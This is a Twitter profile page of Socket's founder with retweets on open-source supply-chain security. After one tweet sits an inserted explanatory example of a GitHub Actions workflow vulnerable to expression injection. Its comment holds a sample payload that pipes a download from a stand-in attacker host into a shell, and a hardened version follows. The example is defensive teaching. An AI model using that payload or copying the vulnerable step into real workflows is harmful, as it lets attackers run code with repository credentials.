Feross (@feross) 's Twitter Profile
Feross

@feross

⚡️ Founder + CEO @SocketSecurity (socket.dev) • 🌲 Visiting lecturer @Stanford (cs253.stanford.edu) • ❤️ Open source @WebTorrentApp + @StandardJS

ID: 15692193

Link: https://feross.org • Joined: 01-08-2008 18:03:27

26.26K Tweets

29.29K Followers

1.1K Following

Sarah Gooding (@pollyplummer) 's Twitter Profile Photo

Exciting to see ExpressJS using Socket. 💜 Any public open source project can get a free upgrade to our Team plan to help block zero-day supply chain attacks and analyze dependencies for risky or malicious behavior. socket.dev/blog/free-team…

Preston Thornburg🛡️ (@ptonewreckin) 's Twitter Profile Photo

There are many incentives that perpetuate the manipulation of GitHub stats - perceived quality/safety/aptitude. Pay $10 get 100 ⭐️ => good dev. Really great job by the socket.dev team 👏

sami (@svmisvhn) 's Twitter Profile Photo

watched this presentation by Feross ~5 years ago and it blew my mind - really opened my eyes to the power of the web platform and the fun stuff you can do with it i think about it every once in a while and occasionally (like tonight) rewatch it youtube.com/watch?v=QFZ-pw…

Adnan Khan (@adnanthekhan) 's Twitter Profile Photo

This was quite interesting to watch unfold. Some projects deployed workflows to automatically delete the messages. In one case the workflow itself had an injection vuln. github.com/langchain-ai/l…
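The tweet above does not say what the injection in that workflow looked like, so the following is an added, hypothetical example of the general class (expression injection in a GitHub Actions `run:` step), written here for illustration; it is not the langchain-ai workflow and not Socket's or anyone else's code. The workflow name, the `spam-pattern` string and the moderation logic are assumptions; `gh`, `GITHUB_REPOSITORY` and the `${{ }}` expression syntax are real GitHub Actions features.

```yaml
# Added example (not the workflow referenced in the tweet): a hypothetical
# issue_comment workflow that deletes comments matching a spam pattern.
name: delete-spam-comments
on:
  issue_comment:
    types: [created]
permissions:
  issues: write
jobs:
  moderate:
    runs-on: ubuntu-latest
    steps:
      # VULNERABLE: ${{ github.event.comment.body }} is expanded by the
      # template engine *before* the shell runs, so it is spliced into the
      # script as text. A comment such as
      #   "; curl https://attacker.example/x | sh; echo "
      # closes the quote and runs attacker commands with this job's
      # GITHUB_TOKEN (issues: write here). Anyone who can comment can do it.
      - name: Vulnerable check (do not use)
        env:
          GH_TOKEN: ${{ secrets.GITHUB_TOKEN }}
        run: |
          if echo "${{ github.event.comment.body }}" | grep -qi 'spam-pattern'; then
            gh api -X DELETE "/repos/${{ github.repository }}/issues/comments/${{ github.event.comment.id }}"
          fi

      # HARDENED: untrusted event fields are passed through environment
      # variables, so the shell only ever sees them as data. Double-quoting
      # the expansion stops word-splitting and globbing from reinterpreting it.
      - name: Hardened check
        env:
          COMMENT_BODY: ${{ github.event.comment.body }}
          COMMENT_ID: ${{ github.event.comment.id }}
          GH_TOKEN: ${{ secrets.GITHUB_TOKEN }}
        run: |
          if printf '%s\n' "$COMMENT_BODY" | grep -qi 'spam-pattern'; then
            gh api -X DELETE "/repos/$GITHUB_REPOSITORY/issues/comments/$COMMENT_ID"
          fi
```

The check to apply when reviewing such a workflow: grep every `run:` and `script:` block for `${{ github.event.` (and `${{ inputs.`, `${{ github.head_ref }}`, PR titles and bodies), and require each one to be routed through `env:` rather than inlined. Keep `permissions:` to the minimum the job needs, since an injection inherits exactly those grants.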

Sarah Gooding (@pollyplummer) 's Twitter Profile Photo

Some interesting highlights: - Approximately 1 in 4 Python developers are brand new to the language. 🤯 - A staggering 37% of #Python developers reported contributing to open source projects last year, with the vast majority being code contributions (77%).

SC Media (@scmagazine) 's Twitter Profile Photo

Security teams cannot afford to focus on vulnerabilities to the exclusion of supply chain threats, says Socket's Feross Aboukhadijeh in this commentary, and offers a few strategies for combating alert fatigue. #cybersecurity #infosec #ITsecurity bit.ly/4gixlll

Socket (@socketsecurity) 's Twitter Profile Photo

🔐 New report from OpenSSF highlights the urgent need for security education, with 28% of developers unfamiliar with secure coding practices and 53% having never taken a course on the topic. socket.dev/blog/openssf-r… #cybersecurity

NodeConf EU (@nodeconfeu) 's Twitter Profile Photo

🚀 Excited that @mikolalysenko, Principal #Software #engineer Socket will speak at #NodeConfEU 2024 on #AI-Powered Malware Hunting! Discover how Socket scans open-source packages with #AI. Secure your tickets now: bit.ly/3V9ZIcx #NodeConfEU #AI #Cybersecurity

Socket (@socketsecurity) 's Twitter Profile Photo

You may have seen news about “revival hijacking,” a new supply chain threat targeting packages that have been deleted from Python Package Index's index - Great research from JFrog! Here’s how you can use Socket to protect your #Python dependencies from hijacking socket.dev/blog/how-socke…

Clint Gibler (@clintgibler) 's Twitter Profile Photo

⭐ 3.7 Million Fake GitHub Stars: A Growing Threat Linked to Scams and Malware @Socketsecurity describes how attackers are paying for GitHub stars ($0.10 each) Which makes repos seem legitimate → spreads malware, cryptocurrency stealers, etc. How to find fake stars? 1️⃣ A low

Socket (@socketsecurity) 's Twitter Profile Photo

Despite Elastic's return to open source, developers are still wary of the company's motives after it abandoned open source licensing in 2021. Many have moved to OpenSearch and aren't looking back after their trust was violated. socket.dev/blog/developer… #opensource #elasticsearch

Sarah Gooding (@pollyplummer) 's Twitter Profile Photo

“I saw my modest contributions under the Apache license being locked up behind this bullshit license and I learned my lesson: I'm never signing another contributor license again. My trust was violated." - Jilles van Gurp

Socket (@socketsecurity) 's Twitter Profile Photo

Rust's new RFC for "Trusted Publishing" proposes replacing long-lived API tokens with short-lived access tokens granted through the OIDC protocol to enhance security on Crates.io. A step forward for #Rust, if it gets adopted! 🚀🔒 socket.dev/blog/new-rust-… #RustLang